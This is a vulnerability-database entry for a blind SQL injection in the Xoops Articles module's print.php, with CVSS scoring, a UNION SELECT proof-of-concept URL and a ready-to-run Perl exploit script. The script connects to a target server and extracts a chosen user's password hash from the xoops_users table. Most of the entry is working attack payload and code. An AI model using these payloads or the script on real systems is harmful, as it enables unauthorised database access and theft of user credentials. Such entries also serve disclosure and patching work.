Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit And PoC

2007.06.26
Credit: UniquE
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit And PoC Type : SQL Injection Release Date : {2007-03-26} Product / Vendor : Xoops Portal http://www.Xoops.Org Bug : http://localhost/script/modules/articles/print.php?id=x AND 1=1 or 1=0 PoC : http://localhost/script/modules/articles/print.php?id=3/**/UNION/**/SELE CT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1 /* Exploit : #!/usr/bin/perl -w ############################################# #Exploit Coded By UNIQUE-KEY[UNIQUE-CRACKER]# ############################################# use IO::Socket; if (@ARGV != 3) { print "n-----------------------------------n"; print "Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploitn"; print "-----------------------------------n"; print "nUniquE-Key{UniquE-Cracker}n"; print "UniquE[at]UniquE-Key.ORGn"; print "http://UniquE-Key.ORGn"; print "n-----------------------------------n"; print "nUsage: $0 <server> <path> <uid>n"; print "Examp: $0 www.victim.com /path 1n"; print "n-----------------------------------n"; exit (); } $server = $ARGV[0]; $path = $ARGV[1]; $uid = $ARGV[2]; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80"); printf $socket ("GET %s/modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL, NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU LL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/* HTTP/1.0nHost: %snAccept: */*nConnection: closenn", $path,$server,$uid); while(<$socket>) { if (/>(w{32})</) { print "nID '$uid' User Password :nn$1n"; } } Tested : All Version Author : UniquE-Key{UniquE-Cracker} UniquE(at)UniquE-Key.Org http://www.UniquE-Key.Org


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top